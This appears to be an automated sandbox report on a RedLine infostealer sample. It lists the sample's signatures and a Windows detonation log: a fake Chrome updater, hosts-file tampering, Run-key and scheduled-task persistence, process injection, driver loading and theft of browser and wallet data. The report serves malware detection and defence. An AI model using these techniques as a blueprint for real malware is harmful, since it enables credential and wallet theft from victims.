Malware Analysis Report

2025-01-18 07:59

Sample ID 230812-nzsd2sde4w
Target 3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712
SHA256 3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712

Threat Level: Known bad

The file 3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712 was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

Stops running service(s)

Downloads MZ/PE file

Drops file in Drivers directory

Executes dropped EXE

Themida packer

Reads user/profile data of web browsers

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-12 11:50

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-12 11:50

Reported

2023-08-12 11:53

Platform

win10-20230703-en

Max time kernel

150s

Max time network

156s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000\Software\Microsoft\Windows\CurrentVersion\Run\AppLaunch = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5104 set thread context of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 836 set thread context of 4436 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 836 set thread context of 1520 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4340 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4340 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4340 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4340 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4340 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4340 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 5104 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5104 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5104 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
